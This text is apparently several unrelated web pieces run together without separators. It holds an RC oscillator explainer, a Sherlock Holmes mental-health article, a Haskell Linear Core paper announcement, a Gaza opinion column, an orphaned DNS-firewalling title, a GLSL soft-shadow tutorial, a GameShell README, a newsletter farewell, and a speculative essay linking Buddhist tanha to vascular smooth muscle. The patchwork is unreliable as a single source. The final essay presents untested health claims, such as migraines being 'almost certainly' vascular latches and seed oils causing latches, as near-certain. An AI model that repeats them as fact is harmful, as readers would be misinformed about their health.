We’re trying to solve for f at which θ = -60°; the value of -tan(-60°) is roughly 1.73, so we can plug that into the equation and then move everything except f to the right. Throwing in the component values for the first R-C stage in the schematic, we obtain:
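Rearranged for f (the specific first-stage R and C values appear in the schematic rather than in the text, so only the general form is shown here):

\(f = \frac{1.73}{2 \pi R C}\)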
You’ll notice that the result is the same for the other two stages: they have higher resistances but proportionally lower capacitances, so the denominator of the fraction doesn’t change.
Oscilloscope traces for the circuit are shown below:
Traces for the three R-C stages.
Because the amplifier’s gain isn’t constrained in any way, the output waveform is a square wave. Nevertheless, in a lowpass circuit with these characteristics, the resulting waveforms are close enough to sinusoids that the sine-wave model approximates the behavior nearly perfectly. We can run a discrete-time simulation to show that the sine-wave behavior of these three R-C stages (gray) aligns pretty well with the square-wave case (blue):
A simulation of a square & sine wave passing through three R-C filters.
To make the output a sine wave, it’s possible to tinker with the feedback loop to lower the circuit’s gain, but it’s hard to get it right; insufficient gain prevents oscillation while excess gain produces distortion. A simpler trick is to tap into the signal on the non-inverting leg (bottom oscilloscope trace) and use the other part of a dual op-amp IC to amplify this signal to your heart’s desire.
Some readers might be wondering why I designed the stages so that each of them has an impedance ten times larger than the stage before it. This is to prevent the filters from appreciably loading each other. If all the impedances were in the same ballpark, the middle filter could source currents from the left as easily as it could from the right. In that situation, finding the point of -180° phase shift with decent accuracy would require calculating the transfer function for the entire six-component Franken-filter; the task is doable but — to use a mathematical term — rather unpleasant.
Footnote: in the literature, the circuit is more often constructed using highpass stages and a discrete transistor as an amplifier. I’d wager that most authors who present the discrete-transistor solution have not actually tried it in practice; otherwise, they would have found it to be quite finicky. The version presented in this article is discussed here.
If you enjoyed the content, please subscribe. I’m not selling anything; it’s just a good way to stay in touch with the writers you like.
How Arthur Conan Doyle Explored Men's Mental Health Through Sherlock Holmes
Note: This article is republished from The Conversation under a Creative Commons license. It includes links to external sites that may earn a commission for purchases. We did not add these links and have kept the original content intact.
Arthur Conan Doyle was not just one of the world’s best crime fiction writers. He was a progressive wordsmith who brought light to controversial and taboo subjects. One of those taboo subjects was male vulnerability and mental health problems – a topic of personal significance to the author.
Doyle was a vulnerable child. His father, Charles, was an alcoholic, which led to financial troubles in the family. Charles was admitted to an asylum in 1881 and spent the next 12 years in various mental care establishments. So began Doyle’s interest in male vulnerability and mental health.
The character of Sherlock Holmes is a true expression of male vulnerability that does not equate it with weakness. Doyle does not represent Holmes as infallible, but as a man others can relate to – he battles with drug addiction, loneliness and depression. His genius thrives in part because of these vulnerabilities, not despite them.
In The Man with the Twisted Lip, for example, a man named Neville St Clair hides his double life. He tells his family that he is a respectable entrepreneur going to London on business. In reality he is begging on the city streets. He lives this double life due to fear and shame over the inability to pay off his debts. “It was a long fight between my pride and the money,” he explains, “but the dollars won at last.”
“I would have endured imprisonment, ay, even execution, rather than have left my miserable secret as a family blot to my children,” St Clair says. In having his character consider execution to protect his and his family’s reputation, Doyle explored the societal expectations of Victorian masculinity and how men struggled with such pressures.
The Stockbroker’s Clerk also examines male suicide, as well as economic and professional anxieties. When Holmes reveals the crimes of Harry Pinner, the man attempts suicide rather than face prison.
In The Engineer’s Thumb, hydraulic engineer Victor is treated physically by Watson and mentally by Holmes. As Doyle writes: “Round one of his hands he had a handkerchief wrapped, which was mottled all over with bloodstains. He was young, not more than five-and-twenty, I should say, with a strong masculine face; but he was exceedingly pale and gave me the impression of a man who was suffering from some strong agitation, which it took all his strength of mind to control.”
The physical injury marks Victor as a victim of physical violence. Watson suggests that Victor is using all his mental capabilities to keep calm about his severe pain. Holmes treats Victor’s mind as he listens to his story: “Pray lie down there and make yourself absolutely at home. Tell us what you can, but stop when you are tired, and keep up your strength with a little stimulant.”
Holmes is a protector, a confidante and a comforter in this scene. He provides Victor with breakfast, induces him to lie down and offers him a stimulant (more than likely brandy).
The extremity of violence that Victor has endured has escalated to mental trauma. In having Holmes treat Victor’s mental trauma while Watson treats his physical pain, Doyle showed the importance of psychological support for men of the age.
Holmes was a highly popular character. To contemporary readers, his drug use and dysfunctional clients were seen as markers of his genius rather than a reflection of the significant social issues that men faced during this period. But today, they offer a window into the mental struggles of Victorian men, and a point of connection between readers of the past and present.
This article features references to books that have been included for editorial reasons, and may contain links to bookshop.org. If you click on one of the links and go on to buy something from bookshop.org, The Conversation UK may earn a commission.
I’m very proud to announce that “Lazy Linearity for a Core Functional Language”, a paper by myself and Bernardo Toninho, will be published at POPL 26!

The extended version of the paper, which includes all proofs, is available here [arXiv, PDF].
The short-ish story: In 2023, for my Master’s thesis, I reached out to Arnaud Spiwack to discuss how Linear Types had been implemented in GHC. I wanted to research compiler optimisations made possible by linearity. Arnaud was quick to tell me:

“Well yes, but you can’t!”

“Even though Haskell is linearly typed, Core isn’t!”1

Linearity is ignored in Core because, as soon as it’s optimised, previously valid linear programs become invalid.
It turns out that traditional linear type systems are too syntactic, or strict, about understanding linearity – but Haskell, regardless of linear types, is lazily evaluated.

Our paper presents a system which, in contrast, also accepts programs that can only be understood as linear under non-strict evaluation. Including the vast majority of optimised linear Core programs (with proofs!).
The key ideas of this paper were developed during my Master’s, but it took a few more years of on-and-off work (supported by my employer Well-Typed) with Bernardo to crystalize the understanding of a “lazy linearity” and strengthen the theoretical results.

Now, the proof of the pudding is in the eating. Go read it!
Abstract
Traditionally, in linearly typed languages, consuming a linear resource is
synonymous with its syntactic occurrence in the program. However, under the
lens of non-strict evaluation, linearity can be further understood
semantically, where a syntactic occurrence of a resource does not necessarily
entail using that resource when the program is executed. While this distinction
has been largely unexplored, it turns out to be inescapable in Haskell’s
optimising compiler, which heavily rewrites the source program in ways that
break syntactic linearity but preserve the program’s semantics. We introduce
Linear Core, a novel system which accepts the lazy semantics of linearity
statically and is suitable for lazy languages such as the Core intermediate
language of the Glasgow Haskell Compiler. We prove that Linear Core is sound,
guaranteeing linear resource usage, and that multiple optimising
transformations preserve linearity in Linear Core while failing to do so in
Core. We have implemented Linear Core as a compiler plugin to validate the
system against linearity-heavy libraries, including linear-base.
1. Core is the intermediate compiler language to which source Haskell is desugared and to which optimisations are applied. ↩︎
Keep Talking About Gaza at Your Thanksgiving Table
Relatives of Palestinians who lost their lives in Israeli attacks that violated the ceasefire in the Gaza Strip mourn at the Aqsa Martyrs Hospital in Deir al-Balah, Gaza, on Nov. 23, 2025.
Photo: Abdalhkem Abu Riash/Anadolu via Getty Images
If Israel’s genocide in Gaza has been a site of tension in your family for the last two Thanksgiving holidays, this year should be no different. The so-called ceasefire might seem like a good excuse to bury the hatchet and enjoy a quieter turkey dinner, but when we look at the harrowing status quo for Palestinians in Gaza today, there is no peace to be thankful for — especially not on a day that marks the remembrance of this country’s own genocide against Indigenous Americans.
To be clear, if two years of livestreamed annihilation have failed to shift your loved ones’ support away from the Israeli ethnostate, I doubt there is anything a dinner table argument could do to persuade them. There can be no reasoning with a worldview that forecloses seeing Palestinians as fully human.
I navigate this with pro-Israel members of my own British Jewish family. It’s painful, and I don’t have any good advice. Whatever your approach with your family, there can be no pretense that the genocide in Gaza is over.
I’ll be thinking of another family this Thanksgiving: that of my student from Gaza.
Families like mine, divided over Israel, are not the important ones here. For my part, I’ll be thinking instead of another family this Thanksgiving: that of my student from Gaza. He escaped in 2024 after Israel bombed his home, killing two of his immediate family members, including his mother. His surviving family are still there, living in tents. He hasn’t heard from them in over two weeks.
It is for families like my student’s that we cannot simply take it easy this Thanksgiving because of the so-called ceasefire in Gaza.
Unending Destruction
While the October 10 agreement has offered some relief for Palestinians, with a significant drop in daily slaughter, displacement, starvation and killings by Israeli forces continue.
Instead of relentless, Israel’s bombings over the last 45 days have been simply ongoing and regular. Israel has killed 345 Palestinians in Gaza, including 120 children, while demolishing over 1,500 structures.
At the same time, only a fraction of the aid trucks which were supposed to enter Gaza daily under the ceasefire agreement have been permitted entry by Israeli forces. Mass, enforced hunger continues in the Strip, where 50 million tons of rubble sits atop well over 10,000 unrecovered bodies.
In the face of such totalizing and unending destruction, it’s hard to find much solace in the fact that the support for the Palestinian cause has grown internationally; that nearly all major international human rights organizations have recognized Israel’s actions as genocidal; that a major wave of nation-states, including France, Canada, and Britain, moved this year to recognize the state of Palestine. The dead, displaced, and occupied can do little with declarations that carry no concrete consequences.
“What we need is a justice plan,” Mosab Abu Toha, the Palestinian writer and poet, told a U.N. meeting this week. “It is time to stop accepting the illusion of peace processes that only entrench injustices.”
With the state of the world as it stands, it feels unlikely that Israeli leaders will be held accountable for their war crimes any time soon. Justice for Palestine is hard to imagine, but we can continue to apply pressure in ways that have already seen paradigms shift. Zohran Mamdani’s victory in the New York City mayoral election was a genuine victory against the perverse weaponization of antisemitism against Israel’s critics. Now New Yorkers must push our next mayor to uphold commitments to Palestinian solidarity and international law.
And there is more those of us living in safety can do. We can send funds and share resources, as so many already do. And we can continue heeding and supporting Palestinians’ call for boycotts, divestment, and sanctions against Israeli institutions complicit in occupation and apartheid.
Activists sometimes say, “Solidarity begins at home.” Yet not everyone can choose their home. If you have the great fortune of spending the holidays with loved ones who share your commitments to justice and liberation, I hope your time together is full of joy. Most of the time, though, solidarity actually begins anywhere but home. So if you choose to spend time with your family knowing that it will be fraught, I wish you luck. The weekend will pass, and there’s urgent work to be done.
DNS Firewalling with MISP and Technitium DNS Server
Disclaimer: the demos on this page use WebGL features that aren’t available on some mobile devices.
A couple of weeks ago I tweeted a video of a toy graphics project (below). It’s not done, but a lot of people liked it which was surprising and fun! A few people asked how it works, so that’s what this post is about.
Under the hood it uses something called a distance field. A distance field is an image like the one below that tells you how far each pixel is from your shape. Light grey pixels are close to the shape and dark grey pixels are far from it.
When the demo starts up, it draws some text on a 2D canvas and generates a distance field of it. It uses a library I wrote that generates distance fields really quickly. If you’re curious how the library works, I wrote about that here.
Our lighting scheme works like this: when processing a particular pixel we consider a ray from it to the light, like so…
If the ray intersects a glyph, the pixel we’re shading must be in shadow because there’s something between it and the light.
The simplest way to check this would be to move along the ray in 1px increments, starting from the pixel we’re shading and ending at the light, repeatedly asking the distance field if we’re distance 0 from a shape. This would work, but it’d be really slow.
We could pick some specific length like 30px and move in increments of that size, but then we risk jumping over glyphs that are smaller than 30px. We might think we’re not in shadow when we should be.
Ray marching’s core idea is this: the distance field tells you how far you are from the closest glyph. You can safely advance along your ray by that distance without skipping over any glyphs.
Let’s walk through an example. We start as pictured above and ask the distance field how far we are from any glyph. Turns out in this case that the answer is 95px (pictured left). This means that we can move 95px along our ray without skipping over anything!
Now we’re a little closer to the light. We repeat the process until we hit the ascender of the b! If the b glyph weren’t there, we’d have kept going until we hit the light.
Below is a demo that shows the ray marching steps for a given pixel. The red box is the pixel we’re shading, and each circle along the ray represents a ray marching step and the distance from the scene at that step.
Try dragging the light and the pixel around to build an intuition for it.
Below is GLSL to implement this technique. It assumes you’ve defined a function getDistance that samples the distance field.
vec2 rayOrigin = ...;
vec2 rayDirection = ...;
float rayProgress = 0.;

while (true) {
  if (rayProgress > distance(rayOrigin, lightPosition)) {
    // We hit the light! This pixel is not in shadow.
    return 1.;
  }

  float sceneDist = getDistance(rayOrigin + rayProgress * rayDirection);
  if (sceneDist <= 0.) {
    // We hit a shape! This pixel is in shadow.
    return 0.;
  }

  rayProgress += sceneDist;
}
It turns out that some pixels are really expensive to process. So in practice we use a for-loop instead of a while loop – that way we bail out if we’ve done too many steps. A common “slow case” in ray marching is when a ray is parallel to the edge of a shape in the scene…
The approach I’ve described so far will get you a scene that looks like the one below.
It’s cool, but the shadows are sharp which doesn’t look very good. The shadows in the demo look more like this…
One big disclaimer is that they’re not physically realistic! Real shadows look like hard shadows where the edges have been fuzzed. This approach does something slightly different: all pixels that were previously in shadow are still fully in shadow. We’ve just added a penumbra of partially shaded pixels around them.
The upside is that they’re pretty and fast to compute, and that’s what I care about! There are three “rules” involved in computing them.
Rule 1: The closer a ray gets to intersecting a shape, the more its pixel should be shadowed. In the image below there are two similar rays (their distances to the shape pictured in yellow and green). We want the one that gets closer to touching the corner to be more shadowed.
This is cheap to compute because the variable sceneDist tells us how far we are from the closest shape at each ray marching step. So the smallest value of sceneDist across all steps is a good approximation for the yellow and green lines in the image above.
Rule 2: if the pixel we’re shading is far from the point where it almost intersects a shape, we want the shadow to spread out more.
Consider two pixels along the ray above. One is closer to the almost-intersection and is lighter (its distance is the green line). The other is farther and darker (its distance is the yellow line). In general: the further a pixel is from its almost intersection, the more “in shadow” we should make it.
This is cheap to compute because the variable rayProgress is the length of the green and yellow lines in the image above.
So: we previously returned 1.0 for pixels that weren’t in shadow. To implement rules 1 and 2, we compute sceneDist / rayProgress on each ray marching step, keep track of its minimum value, and return that instead.
vec2 rayOrigin = ...;
vec2 rayDirection = ...;
float rayProgress = 0.;
float stopAt = distance(samplePt, lightPosition);
float lightContribution = 1.;

for (int i = 0; i < 64; i++) {
  if (rayProgress > stopAt) {
    return lightContribution;
  }

  // `getDistance` samples our distance field texture.
  float sceneDist = getDistance(rayOrigin + rayProgress * rayDirection);
  if (sceneDist <= 0.) {
    // We hit a shape! This pixel is in shadow.
    return 0.;
  }

  lightContribution = min(lightContribution, sceneDist / rayProgress);
  rayProgress += sceneDist;
}

// Ray-marching took more than 64 steps!
return 0.;
This ratio feels kind of magical to me because it doesn’t correspond to any physical value. So let’s build some intuition for it by thinking through why it might take on particular values…
If sceneDist / rayProgress >= 1, then either sceneDist is big or rayProgress is small (relative to each other). In the former case we’re far from any shapes and we shouldn’t be in shadow, so a light value of 1 makes sense. In the latter case, the pixel we’re shadowing is really close to an object casting a shadow and the shadow isn’t fuzzy yet, so a light value of 1 makes sense.
The ratio is 0 only when sceneDist is 0. This corresponds to rays that intersect an object and whose pixels are in shadow.
And here’s a demo of what we have so far…
Rule #3 is the most straightforward one: light gets weaker the further you get from it.
Instead of returning the minimum value of sceneDist / rayProgress verbatim, we multiply it by a distanceFactor which is 1 right next to the light, 0 far away from it, and gets quadratically smaller as you move away from it.
All together, the code for the approach so far looks like this…
vec2 rayOrigin = ...;
vec2 rayDirection = ...;
float rayProgress = 0.;
float stopAt = distance(samplePt, lightPosition);
float lightContribution = 1.;

for (int i = 0; i < 64; i++) {
  if (rayProgress > stopAt) {
    // We hit the light!
    float LIGHT_RADIUS_PX = 800.;

    // fadeRatio is 1.0 next to the light and 0. at LIGHT_RADIUS_PX away.
    float fadeRatio = 1.0 - clamp(stopAt / LIGHT_RADIUS_PX, 0., 1.);

    // We'd like the light to fade off quadratically instead of linearly.
    float distanceFactor = pow(fadeRatio, 2.);

    return lightContribution * distanceFactor;
  }

  // `getDistance` samples our distance field texture.
  float sceneDist = getDistance(rayOrigin + rayProgress * rayDirection);
  if (sceneDist <= 0.) {
    // We hit a shape! This pixel is in shadow.
    return 0.;
  }

  lightContribution = min(lightContribution, sceneDist / rayProgress);
  rayProgress += sceneDist;
}

// Ray-marching took more than 64 steps!
return 0.;
I forget where I found this soft-shadow technique, but I definitely didn’t invent it. Inigo Quilez has a great post on it where he talks about using it in 3D.
Inigo’s post also talks about a gotcha with this approach that you might have noticed in the demos above: it causes banding artifacts. This is because Rule 1 assumes that the smallest value of sceneDist across all steps is a good approximation for the distance from a ray to the scene. This is not always true because we sometimes take very few ray marching steps.
So in my demo I use an improved approximation that Inigo writes about in his post. I also use another trick that is more effective but less performant: instead of advancing by sceneDist on each ray marching step, I advance by something like sceneDist * randomJitter where randomJitter is between 0 and 1.
This improves the approximation because we’re adding more steps to our ray march. But we could do that by advancing by sceneDist * .3. The random jitter ensures that pixels next to each other don’t end up in the same band. This makes the result a little grainy which isn’t great. But I think it looks better than banding… This is an aspect of the demo that I’m still not satisfied with, so if you have ideas for how to improve it please tell me!
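As a rough sketch of that jittered step (the hash function below is a stand-in for whatever per-pixel noise source you prefer; it isn’t part of the original demo), the inner loop could advance like this:

// Hypothetical per-pixel noise; any cheap hash works here.
float hash(vec2 p) {
  return fract(sin(dot(p, vec2(12.9898, 78.233))) * 43758.5453);
}

// Inside the ray-marching loop, instead of `rayProgress += sceneDist;`:
float randomJitter = hash(gl_FragCoord.xy + float(i));  // roughly uniform in [0, 1)
rayProgress += sceneDist * randomJitter;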
Overall my demo has a few extra tweaks that I might write about in future but this is the core of it. Thanks for reading! If you have questions or comments, let me know on Twitter.
Thank you to Jessica Liu, Susan Wang, Matt Nichols and Kenrick Rilee for giving feedback on early drafts of this post! Also, if you enjoyed this post you might enjoy working with me at Figma!
Teaching first-year university students or high schoolers to use a Unix shell is not always the easiest or most entertaining of tasks. GameShell was devised as a tool to help students at the Université Savoie Mont Blanc to engage with a real shell, in a way that encourages learning while also having fun.
The original idea, due to Rodolphe Lepigre, was to run a standard bash session
with an appropriate configuration file that defined "missions" which would be
"checked" in order to progress through the game.
Here is the result...
GameShell is available in English, French and Italian.
Feel free to send us your remarks, questions or suggestions by opening issues or submitting pull requests.
We are particularly interested in any new missions you might create!
Getting started
GameShell should work on any standard Linux system, and also on macOS and BSD (but we have run fewer tests on the latter systems). On Debian or Ubuntu, the only dependencies (besides bash) are the gettext-base and awk packages (the latter is generally installed by default). Some missions have additional dependencies: these missions will be skipped if the dependencies are not met.
On Debian or Ubuntu, run the following command to install all game and mission
dependencies.
The first command will download the latest version of the game in the form of
a self-extracting archive, and the second command will initialise and run the
game from the downloaded archive. Instructions on how to play are provided in
the game directly.
Note that when you quit the game (with control-d or the command gsh exit) your progression will be saved in a new archive (called gameshell-save.sh). Run this archive to resume the game where you left it.
If you prefer not running foreign shell scripts on your computer, you can generate a Docker image with the following:

The game will NOT be saved when you exit, and additional flags are required if you want to run X programs from inside GameShell. Refer to this section of the user manual.
Documentation
To find out more about GameShell, refer to the following documents:
The user manual provides information on how to run the game on all supported platforms (Linux, macOS, BSD), explains how to run the game from the sources, tells you how to generate custom game archives (which is useful if you want to use GameShell for teaching a class), and more.
The developer manual provides information on how to create new missions, how to translate missions, and how to participate in the development of the game.
Sadly, we have to inform you that this is the last issue of “ECMAScript News”. We have been operating at a loss for too long: The number of advertisers and subscribers has been slowly but steadily decreasing over the last two years (vs. constant growth before that). Therefore, we made the difficult decision to stop publishing this newsletter.
The first issue came out on 2016-09-27. We published a total of 368 issues and are thankful for many loyal readers during many interesting years!
Axel may continue this newsletter in some shape or form next year. If he does, he’ll inform you via one last email in 2026.
A unification of Buddhist phenomenology, active inference, and physical reflexes; a practical theory of suffering, tension, and liberation; the core mechanism for medium-term memory and Bayesian updating; a clinically useful dimension of variation and dysfunction; a description of sensory type safety; a celebration of biological life.
Michael Edward Johnson, Symmetry Institute, July 12, 2023.
I. What is tanha?
By default, the brain tries to grasp and hold onto pleasant sensations and push away unpleasant ones. The Buddha called these ‘micro-motions’ of greed and aversion taṇhā, and the Buddhist consensus seems to be that it accounts for an amazingly large proportion (~90%) of suffering.
Romeo Stevens suggests translating the original Pali term as “fused to,” “grasping,” or “clenching,” and that the mind is trying to make sensations feel stable, satisfactory, and controllable. Nick Cammarata suggests “fast grabby thing” that happens within ~100ms after a sensation enters awareness; Daniel Ingram suggests this ‘grab’ can occur as quickly as 25-50ms (personal discussion). Uchiyama Roshi describes tanha in terms of its cure, “opening the hand of thought”; Shinzen Young suggests “fixation”; other common translations of tanha are “desire,” “thirst,” “craving.” The vipassana doctrine is that tanha is something the mind instinctively does, and that meditation helps you see this process as it happens, which allows you to stop doing it. Shinzen estimates that his conscious experience is literally 10x better due to having a satisfying meditation practice.
Tanha is not yet a topic of study in affective neuroscience but I suggest it should be. Neuroscience is generally gated by soluble important mysteries: complex dynamics often arise from complex mechanisms, and complex mechanisms are difficult to untangle. The treasures in neuroscience happen when we find exceptions to this rule: complex dynamics that arise from elegantly simple core mechanisms. When we find one it generally leads to breakthroughs in both theory and intervention. Does “tanha” arise from a simple or complex mechanism? I believe Buddhist phenomenology is very careful about what it calls dependent origination — and this makes items that Buddhist scholarship considers to be ‘basic building-blocks of phenomenology’ particularly likely to have a simple, elegant implementation in the brain — and thus are exceptional mysteries to focus scientific attention on.
I don’t think tanha has 1000 contributing factors; I think it has one crisp, isolatable factor. And I think if we find this factor, it could herald a reorganization of systems neuroscience similar in magnitude to the past shifts of cybernetics, predictive coding, and active inference.
The first clue is what tanha is trying to do for us. I’ll claim today that tanha is a side-effect of a normal, effective strategy our brains use extensively, active inference. Active inference suggests we impel ourselves to action by first creating some predicted sensation (“I have a sweet taste in my mouth” or “I am not standing near that dangerous-looking man”) and then holding it until we act in the world to make this prediction become true (at which point we can release the tension). Active inference argues we store our to-do list as predictions, which are equivalent to untrue sensory observations that we act to make true.
Formally, the “tanha as unskillful active inference” (TUAI) hypothesis is that this process commonly goes awry (i.e. is applied unskillfully) in three ways:
First, the rate of generating normative predictions can outpace our ability to make them true and overloads a very finite system. Basically we try to control too much, and stress builds up.
Second, we generate normative predictions in domains that we cannot possibly control; predicting a taste of cake will linger in our mouth forever, predicting that we did not drop our glass of water on the floor. That good sensations will last forever and the bad did not happen. (This is essentially a “predictive processing” reframe of the story Romeo Stevens has told on his blog, Twitter, and in person.)[1]
Third, there may be a context desynchronization between the system that represents the world model, and the system that maintains predictions-as-operators on this world model. When desynchronization happens and the basis of the world model shifts in relation to the basis of the predictions, predictions become nonspecific or nonsensical noise and stress.
We may also include a catch-all fourth category for when the prediction machinery becomes altered outside of any semantic context, for example metabolic insufficiency leading to impaired operation.
Core resources:
Safron, A. (2020). An Integrated World Modeling Theory (IWMT) of Consciousness: Combining Integrated Information and Global Neuronal Workspace Theories With the Free Energy Principle and Active Inference Framework; Toward Solving the Hard Problem and Characterizing Agentic Causation. Frontiers in Artificial Intelligence, 3. https://doi.org/10.3389/frai.2020.00030
Friston, K., FitzGerald, T., Rigoli, F., Schwartenbeck, P., & Pezzulo, G. (2017). Active inference: A Process Theory. Neural Computation, 29(1), 1-49.
At high frequencies these SOHMs will act as feature detectors, at lower frequencies we might think of them as wind chimes: by the presence and absence of particular SOHMs and their interactions we obtain a subconscious feeling about what kind of environment we’re in and where its rewards and dangers are. We can expect SOHMs will be arranged in a way that optimizes differentiability of possible/likely world states, minimizes crosstalk, and in aggregate constitutes a world model, or in the Neural Annealing / REBUS / ALBUS framework, a belief landscape.
To be in tanha-free “open awareness” without greed, aversion, or expectation is to feel the undoctored hum of your SOHMs. However, we doctor our SOHMs *all the time* — when a nice sensation enters our awareness, we reflexively try to ‘grab’ it and stabilize the resonance; when something unpleasant comes in, we try to push away and deaden the resonance. Likewise society puts expectations on us to “act normal” and “be useful”; we may consider all such SOHM adjustments/predictions as drawing from the same finite resource pool. “Active SOHM management” is effortful (and unpleasant) in rough proportion to how many SOHMs need to be actively managed and how long they need to be managed.
But how can the brain manage SOHMs? And if the Buddhists are right and this creates suffering, why does the brain even try?
Core resources:
Safron, A. (2020). An Integrated World Modeling Theory (IWMT) of Consciousness: Combining Integrated Information and Global Neuronal Workspace Theories With the Free Energy Principle and Active Inference Framework; Toward Solving the Hard Problem and Characterizing Agentic Causation. Frontiers in Artificial Intelligence, 3. https://doi.org/10.3389/frai.2020.00030
I propose reframing tanha as an artifact of the brain’s compression pressure. I.e. tanha is an artifact of a continual process that subtly but systematically pushes on the complexity of ‘what is’ (the neural patterns represented by undoctored SOHMs) to collapse it into a more simple configuration, and sometimes holds it there until we act to make that simplification true. The result of this compression drive conflates “what is”, “what could be”, “what should be”, and “what will be,” and this conflation is the source of no end of moral and epistemological confusion.

This reframes tanha as both the pressure which collapses complexity into simplicity, and the ongoing stress that comes from maintaining the counterfactual aspects of this collapse (compression stress). We can think of this process as balancing two costs: on one hand, applying compression pressure has metabolic and epistemic costs, both immediate and ongoing. On the other hand, the brain is a finite system and if it doesn’t continually “compress away” patterns there will be unmanageable sensory chaos. The right amount of compression pressure is not zero.[2]
Equivalently, we can consider tanha as an excessive forcefulness in the metabolization of uncertainty. Erik P. Hoel has written about energy, information, and uncertainty as equivalent and conserved quantities (Hoel 2020): much like literal digestion, the imperative of the nervous system is to extract value from sensations then excrete the remaining information, leaving a low-information, low-uncertainty, clean slate ready for the next sensation (thank you Benjamin Anderson for discussion). However, we are often unskillful in the ways we try to extract value from sensations, e.g. improperly assessing context, trying to extract too much or too little certainty, or trying to extract forms of certainty inappropriate for the sensation.

We can define a person’s personality, aesthetic, and a large part of their phenomenology in terms of how they metabolize uncertainty — their library of motifs for (a) initial probing, (b) digestion and integration, and (c) excretion/externalization of any waste products, and the particular reagents for this process they can’t give themselves and must seek in the world.
So far we’ve been discussing brain dynamics on the computational level. But how does the brain do all this — what is the mechanism by which it attempts to apply compression pressure to SOHMs? This is essentially the question neuroscience has been asking for the last decade. I believe evolution has coupled two very different systems together to selectively apply compression/prediction pressure in a way that preserves the perceptive reliability of the underlying system (undoctored SOHMs as ground-truth perception) but allows near-infinite capacity for adjustment and hypotheticals. One system focused on perception; one on compression, judgment, planning, and action.
The traditional neuroscience approach for locating these executive functions has been to associate them with particular areas of the brain. I suspect the core logic is hiding much closer to the action.
Above: the vertical section of an artery wall (Wikipedia, emphasis added; video): the physical mechanism by which we grab sensations and make predictions; the proximate cause of 90% of suffering and 90% of goal-directed behavior.
All blood vessels are wrapped by a thin sheath of vascular smooth muscle cells (VSMCs). The current scientific consensus has the vasculature system as a spiderweb of ever-narrower channels for blood, powered by the heart as a central pump, and supporting systems such as the brain, stomach, limbs, and so on by bringing them nutrients and taking away waste. The sheath of muscle wrapped around blood vessels undulates in a process called “vasomotion” that we think helps blood keep circulating, much like peristalsis in the gut helps keep food moving, and can help adjust blood pressure.
I think all this is true, but is also a product of what’s been easy to measure and misses 90% of what these cells do.
Evolution works in layers, and the most ancient base layers often have rudimentary versions of more specialized capacities (Levin 2022) as well as deep control hooks into newer systems that are built around them. The vascular system actually predates neurons and has co-evolved with the nervous system for hundreds of millions of years. It also has mechanical actuators (VSMCs) that have physical access to all parts of the body and can flex in arbitrary patterns and rhythms. It would be extremely surprising if evolution didn’t use this system for something more than plumbing. We can also “follow the money”; the vascular system controls the nutrients and waste disposal for the neural system and will win in any heads-up competition over co-regulation balance.
I expect VSMC contractions to influence nearby neurons through e.g. ephaptic coupling, reducing blood flow, and adjusting local physical resonance, and to be triggered by local dissonance in the electromagnetic field.
I’ll offer three related hypotheses about the computational role of VSMCs[3] today that in aggregate constitute a neural regulatory paradigm I’m calling vasocomputation:
Compressive Vasomotion Hypothesis (CVH): the vasomotion reflex functions as a compression sweep on nearby neural resonances, collapsing and merging fragile ambivalent patterns (the “Bayesian blur” problem) into a more durable, definite state. Motifs of vasomotion, reflexive reactions to uncertainties, and patterns of tanha are equivalent.
Vascular Clamp Hypothesis (VCH): vascular contractions freeze local neural patterns and plasticity for the duration of the contraction, similar to collapsing a superposition or probability distribution, clamping a harmonic system, or pinching a critical network into a definite circuit. Specific vascular constrictions correspond with specific predictions within the Active Inference framework and function as medium-term memory.
Latched Hyperprior Hypothesis (LHH): if a vascular contraction is held long enough, it will engage the latch-bridge mechanism common to smooth muscle cells. This will durably ‘freeze’ the nearby circuit, isolating it from conscious experience and global updating and leading to a much-reduced dynamical repertoire; essentially creating a durable commitment to a specific hyperprior. The local vasculature will unlatch once the prediction the latch corresponds to is resolved, restoring the ability of the nearby neural networks to support a larger superposition of possibilities.
The initial contractive sweep jostles the neural superposition of interpretations into specificity; the contracted state temporarily freezes the result; if the contraction is sustained, the latch bridge mechanism engages and cements this freeze as a hyperprior. With one motion the door of possibility slams shut. And so we collapse our world into something less magical but more manageable, one clench at a time.
Tanha is cringe.
The claim relevant to the Free Energy Principle – Active Inference paradigm is we can productively understand the motifs of smooth muscle cells (particularly in the vascular system) as “where the brain’s top-down predictive models are hiding,” which has been an open mystery in FEP-AI. Specific predictions are held as vascular tension, and vascular tension in turn is released by action, consolidated by Neural Annealing, or rendered superfluous by neural remodeling (hold a pattern in place long enough and it becomes the default). Phrased in terms of the Deep CANALs framework which imports ideas from machine learning: the neural weights that give rise to SOHMs constitute the learning landscape, and SOHMs+vascular tension constitute the inference landscape.
The claim relevant to Theravada Buddhism is we can productively understand the motifs of the vascular system as the means by which we attempt to manipulate our sensations. Vasomotion corresponds to an attempt to ‘pin down’ a sensation (i.e. tanha); muscle contractions freeze patterns; smooth muscle latches block out feelings of possibility and awareness of that somatic area. Progress on the contemplative path will correspond with both using these forms of tension less, and needing them less. I expect cessations to correspond with a nigh-complete absence of vasomotion (and EEG may measure vasomotion moreso than neural activity).
The claim relevant to practical health is that smooth muscle tension, especially in VSMCs, and especially latched tension, is a system science knows relatively little about but is involved in an incredibly wide range of problems, and understanding this system is hugely helpful for knowing how to take care of yourself and others. The “latch-bridge” mechanism is especially important, where smooth muscle cells have a discrete state where they attach their myosin heads to actin in a way that “locks” or “latches” the tension without requiring ongoing energy. Latches take between seconds to minutes to form & dissolve — a simple way to experience the latch-bridge cycle releasing is to have a hot bath and notice waves of muscle relaxation. Latches can persist for minutes, hours, days, months, or years (depending on what prediction they’re stabilizing), and the sum total of all latches likely accounts for the majority of bodily suffering. If you are “holding tension in your body” you are subject to the mechanics of the latch-bridge mechanism. Migraines and cluster headaches are almost certainly inappropriate VSMC latches; all hollow organs are surrounded by smooth muscle and can latch. A long-term diet of poor food (e.g. seed oils) leads to random latch formation and “lumpy” phenomenology. Sauna + cold plunges are an effective way to force the clench-release cycle and release latches; likewise, simply taking time to feel your body and put your attention into latched tissues can release them. Psychedelics can force open latches. Many issues in neuropathy & psychiatry are likely due to what I call “latch spirals” — a latch forms, which reduces blood flow to that area, which reduces energy available to those tissues, which prevents the latch from releasing (since releasing the latch requires activation energy and returning to a freely cycling state also increases the cell’s rate of energy expenditure).
